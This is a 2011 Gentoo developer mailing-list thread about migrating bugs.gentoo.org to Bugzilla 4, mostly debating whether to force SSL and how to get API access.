Re: [gentoo-dev] Bugzilla 4 migration
On 07-03-2011 17:25:02 -0500, Mike Frysinger wrote: As outsider, I don't like to accept another certificate thing, just to view a bugtracker. if we're only forcing *login*, then this isnt an issue +1 -- Fabian Groffen Gentoo on a different level
Re: [gentoo-dev] Bugzilla 4 migration
On 07:50 Tue 08 Mar , Hans de Graaff wrote: On Mon, 2011-03-07 at 08:13 -0600, Donnie Berkholz wrote: Thanks! One thing I've been very interested about in 3.x and 4.x is API access that's better than screen-scraping. I tried using the python-bugzilla client that accesses Bugzilla via XML-RPC but it didn't seem to work. Do we have anything available? I've tried an ipad application that uses xmlrpc and that seemed to work fine. Confirmed with my iphone one. Guess the Python one's broken with BZ 4. Fiddling around manually with xmlrpclib works alright, too. -- Thanks, Donnie Donnie Berkholz Sr. Developer, Gentoo Linux Blog: http://dberkholz.com pgpN0Hq8SDQ9s.pgp Description: PGP signature
Re: [gentoo-dev] Bugzilla 4 migration
On Mon, 07 Mar 2011 15:06:25 -0500 Olivier Crête tes...@gentoo.org wrote: On Mon, 2011-03-07 at 20:47 +0100, Michał Górny wrote: Why does everyone assume it needs to be enforced? If user is interested in protecting his/her data, he/she can simply use https://. If he/she is not, there is no real reason to enforce slower (and not always supported) SSL. Maybe it's not to protect the user, but to protect the Gentoo infrastructure.. And really, SSL has been supported by every browser for the last 15 years. And it is not in any way slow or slower than non-SSL. If you really think you need to force all users to use SSL, thus assuming they're unable to make their own decisions, why don't you restrict bugzie access completely? -- Best regards, Michał Górny signature.asc Description: PGP signature
Re: [gentoo-dev] Bugzilla 4 migration
On Tue, 8 Mar 2011 15:26:34 +0100, MichaÅ‚ Górny wrote: On Mon, 07 Mar 2011 15:06:25 -0500 Olivier Crête tes...@gentoo.org wrote: On Mon, 2011-03-07 at 20:47 +0100, Michał Górny wrote: Why does everyone assume it needs to be enforced? If user is interested in protecting his/her data, he/she can simply use https://. If he/she is not, there is no real reason to enforce slower (and not always supported) SSL. Maybe it's not to protect the user, but to protect the Gentoo infrastructure.. And really, SSL has been supported by every browser for the last 15 years. And it is not in any way slow or slower than non-SSL. If you really think you need to force all users to use SSL, thus assuming they're unable to make their own decisions, why don't you restrict bugzie access completely? Michał, You don't seem to (or pretend not to) understand that using SSL protects not *the user* (in which case, yes, a user is free to leave the door to *his own* house wide open), but the Gentoo infrastructure that is far from his own and that all of us are using. Besides, complaining about SSL being slow is absurd considering how mildly interactive and how low-traffic a typical bugzilla session is. You could do just fine over a 9600 bps modem. Regards, Antoni
Re: [gentoo-dev] Bugzilla 4 migration
On Tue, 08 Mar 2011 16:41:08 +0200 Antoni Grzymała awa...@chopin.edu.pl wrote: On Tue, 8 Mar 2011 15:26:34 +0100, MichaÅ‚ Górny wrote: On Mon, 07 Mar 2011 15:06:25 -0500 Olivier Crête tes...@gentoo.org wrote: On Mon, 2011-03-07 at 20:47 +0100, Michał Górny wrote: Why does everyone assume it needs to be enforced? If user is interested in protecting his/her data, he/she can simply use https://. If he/she is not, there is no real reason to enforce slower (and not always supported) SSL. Maybe it's not to protect the user, but to protect the Gentoo infrastructure.. And really, SSL has been supported by every browser for the last 15 years. And it is not in any way slow or slower than non-SSL. If you really think you need to force all users to use SSL, thus assuming they're unable to make their own decisions, why don't you restrict bugzie access completely? You don't seem to (or pretend not to) understand that using SSL protects not *the user* (in which case, yes, a user is free to leave the door to *his own* house wide open), but the Gentoo infrastructure that is far from his own and that all of us are using. Please explain to me how not using SSL for a particular bugzie user is going to hurt Gentoo infra. Even if we're talking about a dev, and we're really assuming a dev is completely unaware of security issues he/she's dealing with, I'd say power outage could cause more damage. Besides, complaining about SSL being slow is absurd considering how mildly interactive and how low-traffic a typical bugzilla session is. You could do just fine over a 9600 bps modem. It is more absurd to waste 5 minutes trying to establish login session due to packet loss. -- Best regards, Michał Górny signature.asc Description: PGP signature
Re: [gentoo-dev] Bugzilla 4 migration
On Tue, Mar 08, 2011 at 03:53:01PM +0100, Micha?? G??rny wrote: On Tue, 08 Mar 2011 16:41:08 +0200 Antoni Grzyma??a awa...@chopin.edu.pl wrote: On Tue, 8 Mar 2011 15:26:34 +0100, Micha? Grny wrote: On Mon, 07 Mar 2011 15:06:25 -0500 Olivier Cr??te tes...@gentoo.org wrote: On Mon, 2011-03-07 at 20:47 +0100, Micha?? G??rny wrote: Why does everyone assume it needs to be enforced? If user is interested in protecting his/her data, he/she can simply use https://. If he/she is not, there is no real reason to enforce slower (and not always supported) SSL. Maybe it's not to protect the user, but to protect the Gentoo infrastructure.. And really, SSL has been supported by every browser for the last 15 years. And it is not in any way slow or slower than non-SSL. If you really think you need to force all users to use SSL, thus assuming they're unable to make their own decisions, why don't you restrict bugzie access completely? You don't seem to (or pretend not to) understand that using SSL protects not *the user* (in which case, yes, a user is free to leave the door to *his own* house wide open), but the Gentoo infrastructure that is far from his own and that all of us are using. Please explain to me how not using SSL for a particular bugzie user is going to hurt Gentoo infra. Even if we're talking about a dev, and we're really assuming a dev is completely unaware of security issues he/she's dealing with, I'd say power outage could cause more damage. If you access a bug which a user marked private/for devs only, or some security bug, then the process of you viewing this information without SSL would disclose this information to anyone listening on your network. And disclosing your session cookie would allow anyone to find any such private data they _want_ to find rather than just the content you're viewing. Thus, by encrypting everything you are protecting Gentoo users' data which is posted as private on bugzilla because they trust that ``private'' actually means private. Besides, complaining about SSL being slow is absurd considering how mildly interactive and how low-traffic a typical bugzilla session is. You could do just fine over a 9600 bps modem. It is more absurd to waste 5 minutes trying to establish login session due to packet loss. And if you have such a bad internet connection as you claim to have, then perhaps there's a higher chance of people trolling your packets anyways :-p. -- binki Look out for missing apostrophes! pgpgNGileIJ7j.pgp Description: PGP signature
Re: [gentoo-dev] Bugzilla 4 migration
On Sun, 06 Mar 2011 23:55:31 +0100 Christian Ruppert id...@gentoo.org wrote: SSL is enabled by default now, so it's forced. Unfortunately the option to force SSL *only* for logged in user is no longer available in Bugzilla-4.x. It has been added in early 3.x AFAIR and later replaced by forcing SSL at all or not. If *anybody* can't use SSL for any reason please yell so that we can decide if we leave it as it is (plain + encrypted) or not. Is there any *real* reason to force SSL? It is *hell* slow. -- Best regards, Michał Górny signature.asc Description: PGP signature
Re: [gentoo-dev] Bugzilla 4 migration
On Mon, Mar 7, 2011 at 10:12, Michał Górny mgo...@gentoo.org wrote: Is there any *real* reason to force SSL? It is *hell* slow. Do you mean that SSL is slow or that bugs is slow? I also noticed that Bugzilla is very slow right now, but it seems unlikely that it's due to SSL. Cheers, Dirkjan
Re: [gentoo-dev] Bugzilla 4 migration
On Mon, Mar 7, 2011 at 4:12 AM, Michał Górny wrote: On Sun, 06 Mar 2011 23:55:31 +0100 Christian Ruppert wrote: SSL is enabled by default now, so it's forced. Unfortunately the option to force SSL *only* for logged in user is no longer available in Bugzilla-4.x. It has been added in early 3.x AFAIR and later replaced by forcing SSL at all or not. If *anybody* can't use SSL for any reason please yell so that we can decide if we leave it as it is (plain + encrypted) or not. Is there any *real* reason to force SSL? It is *hell* slow. it should of course be force for logging in -mike
Re: [gentoo-dev] Bugzilla 4 migration
On Mon, 7 Mar 2011 10:24:33 +0100 Dirkjan Ochtman d...@gentoo.org wrote: On Mon, Mar 7, 2011 at 10:12, Michał Górny mgo...@gentoo.org wrote: Is there any *real* reason to force SSL? It is *hell* slow. Do you mean that SSL is slow or that bugs is slow? I also noticed that Bugzilla is very slow right now, but it seems unlikely that it's due to SSL. Both but yep, unrelated. I am just a personal SSL-forced-everywhere hater. -- Best regards, Michał Górny signature.asc Description: PGP signature
Re: [gentoo-dev] Bugzilla 4 migration
On Mon, Mar 07, 2011 at 10:12:14AM +0100, Michał Górny wrote: On Sun, 06 Mar 2011 23:55:31 +0100 Christian Ruppert id...@gentoo.org wrote: SSL is enabled by default now, so it's forced. Unfortunately the option to force SSL *only* for logged in user is no longer available in Bugzilla-4.x. It has been added in early 3.x AFAIR and later replaced by forcing SSL at all or not. If *anybody* can't use SSL for any reason please yell so that we can decide if we leave it as it is (plain + encrypted) or not. Is there any *real* reason to force SSL? It is *hell* slow. The SSL forcing is temporarily disabled until we trace down why it's causing slowness. Tracking is in bug 357711. -- Robin Hugh Johnson Gentoo Linux: Developer, Trustee Infrastructure Lead E-Mail : robb...@gentoo.org GnuPG FP : 11AC BA4F 4778 E3F6 E4ED F38E B27B 944E 3488 4E85
Re: [gentoo-dev] Bugzilla 4 migration
On Sun, Mar 06, 2011 at 11:55:31PM +0100, Christian Ruppert wrote: our Bugzilla (bugs.gentoo.org) will be unavailable for the next hours. We're going to migrate our old Bugzilla to Bugzilla-4. We expect our update to finish within the next hours. All completed now. If you run into any problems, please file a new bug under the Bugzilla product. I'm sending this email as idl0r went to be after 8+ hours straight of working on the new Bugzilla setup. We apologize for this taking so extremely long. Things didn't go so well at the database layer [1], and that hugely increased the migration time. The Gentoo for the Bugzilla service went perfectly, a huge thanks to idl0r for the years of work he has put into them. Some notes: SSL is enabled by default now, so it's forced. The forcing is temporarily disabled now until we fix a possible related performance issue, per bug 357711. Footnotes: [1] We discovered a potential MySQL bug with replication, where the slaves end up truncating mediumtext columns to 1024 characters when done with REPLACE INTO and GROUP_CONCAT. Will pursue with upstream this week. This was only noted with mk-table-checksum, and we decided to just redo replication from the master that was used for introducing the schema changes. This added 3.5 hours onto the end of the migration :-(. -- Robin Hugh Johnson Gentoo Linux: Developer, Trustee Infrastructure Lead E-Mail : robb...@gentoo.org GnuPG FP : 11AC BA4F 4778 E3F6 E4ED F38E B27B 944E 3488 4E85 pgpWQInMnvLWm.pgp Description: PGP signature
Re: [gentoo-dev] Bugzilla 4 migration
On 07/03/11 10:51, Robin H. Johnson wrote: The Gentoo for the Bugzilla service went perfectly, a huge thanks to idl0r for the years of work he has put into them. Thanks for all your work on this. signature.asc Description: OpenPGP digital signature
Re: [gentoo-dev] Bugzilla 4 migration
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 07-03-2011 08:51, Robin H. Johnson wrote: On Sun, Mar 06, 2011 at 11:55:31PM +0100, Christian Ruppert wrote: our Bugzilla (bugs.gentoo.org) will be unavailable for the next hours. We're going to migrate our old Bugzilla to Bugzilla-4. We expect our update to finish within the next hours. All completed now. If you run into any problems, please file a new bug under the Bugzilla product. Thank you both for all the work in the upgrade and for all the maintenance work you've been doing for years on our Bugzilla. - -- Regards, Jorge Vicetto (jmbsvicetto) - jmbsvicetto at gentoo dot org Gentoo- forums / Userrel / Devrel / KDE / Elections / RelEng -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.17 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQIcBAEBAgAGBQJNdMHeAAoJEC8ZTXQF1qEPzMwP/Rgc/F0ffJ8N5nKcW6DmcAO6 Xk8mPs7aMZ+YKdUmt0Ti67QMkGXn7UYDGqcEysKJzPY8G9aPboGZ/rrZIKU8kUtN ddD++GO/yrqIBmMZaohXd28SSCTi7Ea+fmZSreL9Kq3Z9JSMIRNvCXKxlDVb82ll wV44OPdrmRkTJ561fARuWxUs0NY7KnSUuBQ2Xr2dqjYQ3FsxtBK9RwDag1wFf24W rJwoIHa9a/jRyp4eYlAErWdcQKDrdtfJWTX2gNjjp67JDO/PJBBvb2qXzGebjgra iKpTfVKqXRt5TGWvL+UkKKi220St0C83wBXhmOSRbpaLBEq6+dvLPJT0nGEeaO1s 2dY6I1CFdW+oK8fEg+V1+4djWJ7CwRfg9uH2q9lgxZXXBw6uq4vsLjWwMr+O20hE zwXNhHhq77VsJGENM3o+NFeiGvw4+j+1metvzsQgNQTq2gcnEeSiXxxwXWD7P2d5 QfjTlJg5Y6u6f3YnNYYNckgizeFmm5SkgKElET0wBD2ILChPMshhyB+aPnMlkzTm DJKcwr/9C1g9pEHjoUC8uOrIGTDny/uP/IOgBlbvBFwkH9u258spI/nkHliyF0y1 xVtXveYp4k/8GCuUyGscj5oeVqTdft65x47oDRYzWw93vb1Aacenkei2RciN9ueo nxpA5Kc0okEJVptcq1uT =vJNK -END PGP SIGNATURE-
Re: [gentoo-dev] Bugzilla 4 migration
On Sun, Mar 06, 2011 at 11:55:31PM +0100, Christian Ruppert wrote: Dear community, our Bugzilla (bugs.gentoo.org) will be unavailable for the next hours. We're going to migrate our old Bugzilla to Bugzilla-4. We expect our update to finish within the next hours. Some notes: SSL is enabled by default now, so it's forced. Unfortunately the option to force SSL *only* for logged in user is no longer available in Bugzilla-4.x. It has been added in early 3.x AFAIR and later replaced by forcing SSL at all or not. If *anybody* can't use SSL for any reason please yell so that we can decide if we leave it as it is (plain + encrypted) or not. All custom/Gentoo patches will be available *later* in a git repo[1]. So if you'd like to fix something or improve the theme you can contribute patches. Thanks to Alex Legler (a3li) for the Bugzilla theme. [1] http://git.overlays.gentoo.org/gitweb/?p=proj/gentoo-bugzilla.git;a=summary -- Regards, Christian Ruppert Role: Gentoo Linux developer, Bugzilla administrator and Infrastructure member Fingerprint: EEB1 C341 7C84 B274 6C59 F243 5EAB 0C62 B427 ABC8 Thank you very much. New bugzie looks pretty :) Regards, -- Markos Chandras / Gentoo Linux Developer / Key ID: B4AFF2C2 pgpqdtUPg7103.pgp Description: PGP signature
Re: [gentoo-dev] Bugzilla 4 migration
On 09:51 Mon 07 Mar , Robin H. Johnson wrote: The Gentoo for the Bugzilla service went perfectly, a huge thanks to idl0r for the years of work he has put into them. Thanks! One thing I've been very interested about in 3.x and 4.x is API access that's better than screen-scraping. I tried using the python-bugzilla client that accesses Bugzilla via XML-RPC but it didn't seem to work. Do we have anything available? -- Thanks, Donnie Donnie Berkholz Sr. Developer, Gentoo Linux Blog: http://dberkholz.com pgpThu2dFRGyd.pgp Description: PGP signature
Re: [gentoo-dev] Bugzilla 4 migration
Hi! On Mon, 07 Mar 2011, Mike Frysinger wrote: If *anybody* can't use SSL for any reason please yell so that we can decide if we leave it as it is (plain + encrypted) or not. Is there any *real* reason to force SSL? It is *hell* slow. it should of course be force for logging in If it is enforced for login, it should be enforced for logged in sessions, cf. Cookie stealing (for a POC: Firesheep). And no, restricting the login cookie to an IP is *not* safe enough. Regards, Tobias -- Sent from aboard the Culture ship GSV Zero Gravitas
Re: [gentoo-dev] Bugzilla 4 migration
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 On 03/07/2011 09:48 AM, Tobias Klausmann wrote: Hi! On Mon, 07 Mar 2011, Mike Frysinger wrote: If *anybody* can't use SSL for any reason please yell so that we can decide if we leave it as it is (plain + encrypted) or not. Is there any *real* reason to force SSL? It is *hell* slow. it should of course be force for logging in If it is enforced for login, it should be enforced for logged in sessions, cf. Cookie stealing (for a POC: Firesheep). And no, restricting the login cookie to an IP is *not* safe enough. Regards, Tobias First off, a big thanks to infra and all involved in the migration. It looks awesome! As to the SSL bit, there is *no* reason not to be using SSL for anything that requires a username / password. And I 100% agree with Tobias. If it's necessary to use SSL to login, it's necessary to use it for the duration of the session. I don't know how feasible it is to do, but if normal viewing (no login) can be left SSL free, I see no issue there. Otherwise however, SSL should be in use. Regards, - -- Dane Smith (c1pher) Gentoo Linux Developer -- QA / Crypto / Sunrise / x86 RSA Key: http://pgp.mit.edu:11371/pks/lookup?search=0x0C2E1531op=index -BEGIN PGP SIGNATURE- Version: GnuPG v2.0.17 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/ iQIcBAEBAgAGBQJNdPDCAAoJEEsurZwMLhUxFtUP/istnBrfWjaj8SoHmweB5Uh8 Fblpar2tWVqqSORPV0fkXnYogXK8EbSl4eQDo6Q5LZt4OUzP2T4rLOrrexaxL2s/ GzKYHeoEsUKAfkZa5W3bmL8ZaL0ueYFqM/ucx1r9iGEqEOIr33G3eaR3AlaovmjV Qw/r0McPFJDxqZz+79Xl/sFTFJaDHebEKiYT9Y40m3+6Ha4EqWcZ5DLX41/kfE77 Du+hCdf5J3E29vED3qtY5FBrmzG4ILBPCXbYxW8IMbpizQAzj7XzH8ZxjA9OvPOJ S0kxrjQR9oFodiPETYf/vOpsHlp/D3+HECRo4Qa1OJBdkb70ci+5XHoY3GvdAKUe MN3jCf94CSxlCyJcngWoyiu9j93l2Z3ctjq3cHo1dH4ETo686jyKFm4xBBkm4UrF Co6c/pkX+78m2Py4hcWml+X2reYMurTC0dRG42YCW3dXRMJha6OZKIKXTf19FakL bEd0adIK99t+N3i63yKIsd9p5SrU0H2ysJtX2wNyUVMAYnAad7gn7SGCKCytmvAo 4R8to3O7DitfIXAAz78Zj5vwa9VIbPu8dCTV0zo2XHE5EOXfu87YMQYKQQU1KwXK 9Rx0ZLys+vQCJL1EhezXBRcG39ksVHI1/hytD3LMTeRRXeQLJUrE3LK64mxtEARH f7uLbv3dNgsjbhIM7jfQ =CxR9 -END PGP SIGNATURE-
Re: [gentoo-dev] Bugzilla 4 migration
On Mon, Mar 7, 2011 at 9:48 AM, Tobias Klausmann wrote: On Mon, 07 Mar 2011, Mike Frysinger wrote: If *anybody* can't use SSL for any reason please yell so that we can decide if we leave it as it is (plain + encrypted) or not. Is there any *real* reason to force SSL? It is *hell* slow. it should of course be force for logging in If it is enforced for login, it should be enforced for logged in sessions, cf. Cookie stealing (for a POC: Firesheep). And no, restricting the login cookie to an IP is *not* safe enough. you're talking about two different things. imo it's more important to protect the credentials than spoofing/replay attacks. the former is a no brainer while the latter is fine to leave to the discretion of the end user. -mike
Re: [gentoo-dev] Bugzilla 4 migration
On 16:35 Mon 07 Mar , Dirkjan Ochtman wrote: On Mon, Mar 7, 2011 at 15:13, Donnie Berkholz dberkh...@gentoo.org wrote: Thanks! One thing I've been very interested about in 3.x and 4.x is API access that's better than screen-scraping. I tried using the python-bugzilla client that accesses Bugzilla via XML-RPC but it didn't seem to work. Do we have anything available? Is that the one you get if you emerge pybugz? No, pybugz is a screen-scraper. We previously had Bugzilla 2 so we couldn't do anything else. The Mozilla guys made a pretty nice REST API that can be installed as a plugin, I think. Maybe we could run that? I've been somewhat following that too, but I don't know if anyone's written a CLI client for it yet, whereas python-bugzilla already exists (and has an ebuild in the sabayon overlay). -- Thanks, Donnie Donnie Berkholz Sr. Developer, Gentoo Linux Blog: http://dberkholz.com pgpXcCnIenCNR.pgp Description: PGP signature
Re: [gentoo-dev] Bugzilla 4 migration
On Mon, 7 Mar 2011 15:48:19 +0100 Tobias Klausmann klaus...@gentoo.org wrote: On Mon, 07 Mar 2011, Mike Frysinger wrote: If *anybody* can't use SSL for any reason please yell so that we can decide if we leave it as it is (plain + encrypted) or not. Is there any *real* reason to force SSL? It is *hell* slow. it should of course be force for logging in If it is enforced for login, it should be enforced for logged in sessions, cf. Cookie stealing (for a POC: Firesheep). And no, restricting the login cookie to an IP is *not* safe enough. Why does everyone assume it needs to be enforced? If user is interested in protecting his/her data, he/she can simply use https://. If he/she is not, there is no real reason to enforce slower (and not always supported) SSL. It's like forcing everyone to have doors with semi-automatic locks. -- Best regards, Michał Górny signature.asc Description: PGP signature
Re: [gentoo-dev] Bugzilla 4 migration
On 03/07/2011 08:47 PM, Michał Górny wrote: On Mon, 7 Mar 2011 15:48:19 +0100 Tobias Klausmann klaus...@gentoo.org wrote: On Mon, 07 Mar 2011, Mike Frysinger wrote: If *anybody* can't use SSL for any reason please yell so that we can decide if we leave it as it is (plain + encrypted) or not. Is there any *real* reason to force SSL? It is *hell* slow. it should of course be force for logging in If it is enforced for login, it should be enforced for logged in sessions, cf. Cookie stealing (for a POC: Firesheep). And no, restricting the login cookie to an IP is *not* safe enough. Why does everyone assume it needs to be enforced? If user is interested in protecting his/her data, he/she can simply use https://. If he/she is not, there is no real reason to enforce slower (and not always supported) SSL. It's like forcing everyone to have doors with semi-automatic locks. *I* think it's ok if we're going to protect *our* data. Some user may even benefit from it. I don't see any disadvantages for our users. -- Regards, Christian Ruppert Role: Gentoo Linux developer, Bugzilla administrator and Infrastructure member Fingerprint: EEB1 C341 7C84 B274 6C59 F243 5EAB 0C62 B427 ABC8 signature.asc Description: OpenPGP digital signature
Re: [gentoo-dev] Bugzilla 4 migration
On Mon, 2011-03-07 at 20:47 +0100, Michał Górny wrote: On Mon, 7 Mar 2011 15:48:19 +0100 Tobias Klausmann klaus...@gentoo.org wrote: On Mon, 07 Mar 2011, Mike Frysinger wrote: If *anybody* can't use SSL for any reason please yell so that we can decide if we leave it as it is (plain + encrypted) or not. Is there any *real* reason to force SSL? It is *hell* slow. it should of course be force for logging in If it is enforced for login, it should be enforced for logged in sessions, cf. Cookie stealing (for a POC: Firesheep). And no, restricting the login cookie to an IP is *not* safe enough. Why does everyone assume it needs to be enforced? If user is interested in protecting his/her data, he/she can simply use https://. If he/she is not, there is no real reason to enforce slower (and not always supported) SSL. Maybe it's not to protect the user, but to protect the Gentoo infrastructure.. And really, SSL has been supported by every browser for the last 15 years. And it is not in any way slow or slower than non-SSL. -- Olivier Crête tes...@gentoo.org Gentoo Developer signature.asc Description: This is a digitally signed message part
Re: [gentoo-dev] Bugzilla 4 migration
On 07-03-2011 15:06:25 -0500, Olivier Crête wrote: Maybe it's not to protect the user, but to protect the Gentoo infrastructure.. And really, SSL has been supported by every browser for the last 15 years. And it is not in any way slow or slower than non-SSL. but the certificate security click-through-couple-of-times before you can access bugzilla is sort of annoying As outsider, I don't like to accept another certificate thing, just to view a bugtracker. -- Fabian Groffen Gentoo on a different level
Re: [gentoo-dev] Bugzilla 4 migration
On Mon, Mar 7, 2011 at 4:32 PM, Fabian Groffen grob...@gentoo.org wrote: As outsider, I don't like to accept another certificate thing, just to view a bugtracker. When you think about it, this is a defect with your browser, and not so much with SSL itself. Your browser generally doesn't complain about unauthenticated connections. It accepts unauthenticated connections that aren't encrypted without any issues, despite these being completely open to numerous attacks. However, your browser does complain when it makes an unauthenticated connection that IS encrypted, even though this is vulnerable to far fewer attacks. Browsers shouldn't bug the user about self-signed certificates - they should simply and clearly show that the user is connected to a host that isn't authenticated by a trusted intermediate. Oh, and browsers shouldn't come with root certs pre-installed by the browser distributor either, but that is about as likely to get fixed as the problem I just described. In any case, I don't see poor browser design as a valid reason for avoiding the use of SSL... Rich
Re: [gentoo-dev] Bugzilla 4 migration
On 07-03-2011 16:52:23 -0500, Rich Freeman wrote: In any case, I don't see poor browser design as a valid reason for avoiding the use of SSL... Please use a MUA that properly honours Reply-To: headers. I'm on the list. -- Fabian Groffen Gentoo on a different level
Re: [gentoo-dev] Bugzilla 4 migration
On Monday, March 07, 2011 16:59:22 Fabian Groffen wrote: On 07-03-2011 16:52:23 -0500, Rich Freeman wrote: In any case, I don't see poor browser design as a valid reason for avoiding the use of SSL... Please use a MUA that properly honours Reply-To: headers. I'm on the list. subscribed != receiving. there's no way of knowing who is. get over it. -mike signature.asc Description: This is a digitally signed message part.
Re: [gentoo-dev] Bugzilla 4 migration
On Monday, March 07, 2011 16:32:55 Fabian Groffen wrote: On 07-03-2011 15:06:25 -0500, Olivier Crête wrote: Maybe it's not to protect the user, but to protect the Gentoo infrastructure.. And really, SSL has been supported by every browser for the last 15 years. And it is not in any way slow or slower than non-SSL. but the certificate security click-through-couple-of-times before you can access bugzilla is sort of annoying i heard rumors the cacert is finally going into firefox ... As outsider, I don't like to accept another certificate thing, just to view a bugtracker. if we're only forcing *login*, then this isnt an issue -mike signature.asc Description: This is a digitally signed message part.
Re: [gentoo-dev] Bugzilla 4 migration
On Mon, 2011-03-07 at 08:13 -0600, Donnie Berkholz wrote: Thanks! One thing I've been very interested about in 3.x and 4.x is API access that's better than screen-scraping. I tried using the python-bugzilla client that accesses Bugzilla via XML-RPC but it didn't seem to work. Do we have anything available? I've tried an ipad application that uses xmlrpc and that seemed to work fine. Kind regards, Hans signature.asc Description: This is a digitally signed message part
Re: [gentoo-dev] Bugzilla 4 migration
On 03/07/2011 01:00 AM, Jan Kundrát wrote: On 03/06/11 23:55, Christian Ruppert wrote: our Bugzilla (bugs.gentoo.org) will be unavailable for the next hours. We're going to migrate our old Bugzilla to Bugzilla-4. We expect our update to finish within the next hours. (Private reply, as I don't feel like flaming you in public. Feel free to re-send to a public list, or quote, preferably as a whole.) Hi Christian, I wanted to ask if I missed the announcement of the migration. I tried to imagine a case which would force people to go ahead and perform such an action without informing the world about the downtime in advance, but failed to find one. So, did I miss the announcement, or was that a lapse on some guy's side, or is it something else which warranted a swift action? Anyway, I'm looking forward to a nice, upgraded bugzie. Hm, so before sending this mail, I checked my gentoo-dev archive, and the first e-mail about Bugzilla migration is roughly 12 hours old. That's very different from how Infra has handled any other migration in the past (apart from dealing with unexpected emergencies, of course). I realize I'm in the armchair position in this case, but this looks like a rather dangerous move. When you add the workflow change, I wouldn't stick with an announcement 12 hours in advance myself (I do sysadmin stuff as a day job). With kind regards, Jan Hey Jan, I know I didn't announce it properly. It was *my* fault but this is also a special case IMO. We decided to migrate just a few hours ago because robbat2 and me having enough time to do it now, finally. We're waiting since about 2007 for Bugzilla upgrades and it's now 2011 so I thought it's ok to do it now instead of waiting another few months (probably) or longer until we both have enough time again etc. We're not going to change the workflow, at least not now. We only do that if you guys decided about it. -- Regards, Christian Ruppert Role: Gentoo Linux developer, Bugzilla administrator and Infrastructure member Fingerprint: EEB1 C341 7C84 B274 6C59 F243 5EAB 0C62 B427 ABC8 signature.asc Description: OpenPGP digital signature
